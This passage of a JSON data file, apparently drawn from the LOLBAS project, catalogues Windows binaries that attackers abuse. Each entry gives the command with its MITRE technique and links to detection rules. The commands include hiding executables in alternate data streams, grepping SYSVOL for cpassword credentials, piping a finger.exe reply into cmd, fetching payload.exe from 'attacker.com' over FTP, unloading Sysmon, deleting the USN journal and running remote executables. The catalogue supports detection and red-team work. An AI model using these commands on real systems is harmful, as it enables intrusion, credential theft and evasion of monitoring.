installation","aliases":[]},{"id":"lolbas:findstr-exe:0","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe","description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) the specified .exe file is written to an Alternate Data Stream (ADS) of the specified target file.","usecase":"Add a file to an alternate data stream to hide from defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:findstr-exe:1","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe","description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.","usecase":"Add a file to an alternate data stream from a webdav server to hide from defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:findstr-exe:2","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"findstr /S /I cpassword \\\\sysvol\\policies\\*.xml","description":"Search for stored password in Group Policy files stored on SYSVOL.","usecase":"Find credentials stored in cpassword attrbute","mitre":["T1552.001"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:findstr-exe:3","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE:.exe}","description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.","usecase":"Download/Copy file from webdav server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:finger-exe:0","toolId":"lolbas:finger-exe","toolName":"Finger.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"finger user@example.host.com | more +2 | cmd","description":"Downloads payload from remote Finger server. This example connects to \"example.host.com\" asking for user \"user\"; the result could contain malicious shellcode which is executed by the cmd process.","usecase":"Download malicious payload","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\finger.exe","c:\\windows\\syswow64\\finger.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_finger_usage.yml"},{"type":"IOC","value":"finger.exe should not be run on a normal workstation."},{"type":"IOC","value":"finger.exe connecting to external resources."}],"references":["https://twitter.com/DissectMalware/status/997340270273409024","https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)","https://lolbas-project.github.io/lolbas/Binaries/Finger/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:fltmc-exe:0","toolId":"lolbas:fltmc-exe","toolName":"fltMC.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"fltMC.exe unload SysmonDrv","description":"Unloads a driver used by security agents","usecase":"Defense evasion","mitre":["T1562.001"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\fltMC.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml"},{"type":"IOC","value":"4688 events with fltMC.exe"}],"references":["https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon","https://lolbas-project.github.io/lolbas/Binaries/fltMC/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:forfiles-exe:0","toolId":"lolbas:forfiles-exe","toolName":"Forfiles.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"forfiles /p c:\\windows\\system32 /m notepad.exe /c \"{CMD}\"","description":"Executes specified command since there is a match for notepad.exe in the c:\\windows\\System32 folder.","usecase":"Use forfiles to start a new process to evade defensive counter measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\forfiles.exe","C:\\Windows\\SysWOW64\\forfiles.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml"}],"references":["https://twitter.com/vector_sec/status/896049052642533376","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Forfiles/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:forfiles-exe:1","toolId":"lolbas:forfiles-exe","toolName":"Forfiles.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"forfiles /p c:\\windows\\system32 /m notepad.exe /c \"{PATH_ABSOLUTE}:evil.exe\"","description":"Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.","usecase":"Use forfiles to start a new process from a binary hidden in an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\forfiles.exe","C:\\Windows\\SysWOW64\\forfiles.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml"}],"references":["https://twitter.com/vector_sec/status/896049052642533376","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Forfiles/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:fsutil-exe:0","toolId":"lolbas:fsutil-exe","toolName":"Fsutil.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE}","description":"Zero out a file","usecase":"Can be used to forensically erase a file","mitre":["T1485"],"privilege":"user","fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"fsutil.exe should not be run on a normal workstation"},{"type":"IOC","value":"file setZeroData (not case-sensitive) in the process arguments"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process fsutil.exe with trace decode could be suspicious"},{"type":"IOC","value":"Non-Windows netsh.exe execution"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"}],"references":["https://twitter.com/0gtweet/status/1720724516324704404","https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:fsutil-exe:1","toolId":"lolbas:fsutil-exe","toolName":"Fsutil.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"fsutil.exe usn deletejournal /d c:","description":"Delete the USN journal volume to hide file creation activity","usecase":"Can be used to hide file creation activity","mitre":["T1485"],"privilege":"user","fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"fsutil.exe should not be run on a normal workstation"},{"type":"IOC","value":"file setZeroData (not case-sensitive) in the process arguments"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process fsutil.exe with trace decode could be suspicious"},{"type":"IOC","value":"Non-Windows netsh.exe execution"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"}],"references":["https://twitter.com/0gtweet/status/1720724516324704404","https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:fsutil-exe:2","toolId":"lolbas:fsutil-exe","toolName":"Fsutil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"fsutil.exe trace decode","description":"Executes a pre-planted binary named netsh.exe from the current directory.","usecase":"Spawn a pre-planted executable from fsutil.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"fsutil.exe should not be run on a normal workstation"},{"type":"IOC","value":"file setZeroData (not case-sensitive) in the process arguments"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process fsutil.exe with trace decode could be suspicious"},{"type":"IOC","value":"Non-Windows netsh.exe execution"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"}],"references":["https://twitter.com/0gtweet/status/1720724516324704404","https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ftp-exe:0","toolId":"lolbas:ftp-exe","toolName":"Ftp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt","description":"Executes the commands you put inside the text file.","usecase":"Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\ftp.exe","C:\\Windows\\SysWOW64\\ftp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml"},{"type":"IOC","value":"cmd /c as child process of ftp.exe"}],"references":["https://twitter.com/0xAmit/status/1070063130636640256","https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939","https://ss64.com/nt/ftp.html","https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/","https://lolbas-project.github.io/lolbas/Binaries/Ftp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ftp-exe:1","toolId":"lolbas:ftp-exe","toolName":"Ftp.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"cmd.exe /c \"@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v\"","description":"Download","usecase":"Spawn new process using ftp.exe. Ftp.exe downloads the binary.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\ftp.exe","C:\\Windows\\SysWOW64\\ftp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml"},{"type":"IOC","value":"cmd /c as child process of ftp.exe"}],"references":["https://twitter.com/0xAmit/status/1070063130636640256","https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939","https://ss64.com/nt/ftp.html","https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/","https://lolbas-project.github.io/lolbas/Binaries/Ftp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:gpscript-exe:0","toolId":"lolbas:gpscript-exe","toolName":"Gpscript.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Gpscript /logon","description":"Executes logon scripts configured in Group Policy.","usecase":"Add local group policy logon script to execute file and hide from defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\gpscript.exe","C:\\Windows\\SysWOW64\\gpscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml"},{"type":"IOC","value":"Scripts added in local group policy"},{"type":"IOC","value":"Execution of Gpscript.exe after logon"}],"references":["https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/","https://lolbas-project.github.io/lolbas/Binaries/Gpscript/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:gpscript-exe:1","toolId":"lolbas:gpscript-exe","toolName":"Gpscript.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Gpscript /startup","description":"Executes startup scripts configured in Group Policy","usecase":"Add local group policy logon script to execute file and hide from defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\gpscript.exe","C:\\Windows\\SysWOW64\\gpscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml"},{"type":"IOC","value":"Scripts added in local group policy"},{"type":"IOC","value":"Execution of Gpscript.exe after logon"}],"references":["https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/","https://lolbas-project.github.io/lolbas/Binaries/Gpscript/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:hh-exe:0","toolId":"lolbas:hh-exe","toolName":"Hh.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"HH.exe {REMOTEURL:.bat}","description":"Open the target batch script with HTML Help.","usecase":"Download files from url","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml"}],"references":["https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/","https://lolbas-project.github.io/lolbas/Binaries/Hh/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:hh-exe:1","toolId":"lolbas:hh-exe","toolName":"Hh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"HH.exe {PATH_ABSOLUTE:.exe}","description":"Executes specified executable with HTML Help.","usecase":"Execute process with HH.exe","mitre":["T1218.001"],"privilege":"user","fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml"}],"references":["https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/","https://lolbas-project.github.io/lolbas/Binaries/Hh/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:hh-exe:2","toolId":"lolbas:hh-exe","toolName":"Hh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"HH.exe {REMOTEURL:.chm}","description":"Executes a remote .chm file which can contain commands.","usecase":"Execute commands with HH.exe","mitre":["T1218.001"],"privilege":"user","fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml"}],"references":["https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/","https://lolbas-project.github.io/lolbas/Binaries/Hh/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:imewdbld-exe:0","toolId":"lolbas:imewdbld-exe","toolName":"IMEWDBLD.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe {REMOTEURL}","description":"IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml"}],"references":["https://twitter.com/notwhickey/status/1367493406835040265","https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ie4uinit-exe:0","toolId":"lolbas:ie4uinit-exe","toolName":"Ie4uinit.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ie4uinit.exe -BaseSettings","description":"Executes commands from a specially prepared ie4uinit.inf file.","usecase":"Get code execution by copy files to another location","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\ie4uinit.exe","c:\\windows\\sysWOW64\\ie4uinit.exe","c:\\windows\\system32\\ieuinit.inf","c:\\windows\\sysWOW64\\ieuinit.inf"],"toolType":"Binary","detection":[{"type":"IOC","value":"ie4uinit.exe copied outside of %windir%"},{"type":"IOC","value":"ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:iediagcmd-exe:0","toolId":"lolbas:iediagcmd-exe","toolName":"iediagcmd.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"set windir=c:\\test& cd \"C:\\Program Files\\Internet Explorer\\\" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}","description":"Executes binary that is pre-planted at C:\\test\\system32\\netsh.exe.","usecase":"Spawn a pre-planted executable from iediagcmd.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Internet Explorer\\iediagcmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process iediagcmd.exe with /out could be suspicious"}],"references":["https://twitter.com/Hexacorn/status/1507516393859731456","https://lolbas-project.github.io/lolbas/Binaries/iediagcmd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ieexec-exe:0","toolId":"lolbas:ieexec-exe","toolName":"Ieexec.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ieexec.exe {REMOTEURL:.exe}","description":"Downloads and executes executable from the remote server.","usecase":"Download and run attacker code from remote location","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"IOC","value":"Network connections originating from ieexec.exe may be suspicious"}],"references":["https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/","https://lolbas-project.github.io/lolbas/Binaries/Ieexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ieexec-exe:1","toolId":"lolbas:ieexec-exe","toolName":"Ieexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ieexec.exe {REMOTEURL:.exe}","description":"Downloads and executes executable from the remote server.","usecase":"Download and run attacker code from remote location","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"IOC","value":"Network connections originating from ieexec.exe may be 